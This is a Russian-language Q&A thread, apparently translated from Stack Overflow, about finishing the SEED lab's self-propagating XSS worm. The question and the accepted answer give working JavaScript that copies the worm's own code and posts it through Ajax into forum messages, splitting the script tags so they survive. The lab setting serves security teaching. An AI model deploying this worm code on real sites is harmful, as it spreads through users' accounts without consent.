Отправка тегов <script> в содержимом ajax
Я работаю над переносом этой лаборатории: http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf
Для проекта. Сначала, однако, я должен быть в состоянии завершить это сам. Я пытаюсь выработать самовоспроизводящегося червя, и у меня возникают некоторые трудности. Как я могу отправить тег сценария через контент? Если я попробую:
var wormCode = getElementById("worm"); var escapedWorm = escape(wormCode.innerHTML); content="topicTitle=testprop&postText=<script>"+escapedWorm+"</script>&forum=3&action=ptopic"; Ajax.send(content);
Тег выделяется из большего javascript, в котором он находится. Я также попытался разделить его на:
...+"</scr"+"ipt>&...
но это не сработало.
Какие-нибудь советы?
редактировать: дополнено моими более свежими (и я надеюсь, точными) попытками.
2 ответа
Решение
var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);Вы не избегаете тегов сценария.
Разделение тега конечного сценария на две части в конце концов сработало. Я думаю, что проблемы, которые у меня были с этим, были специфическими для браузера.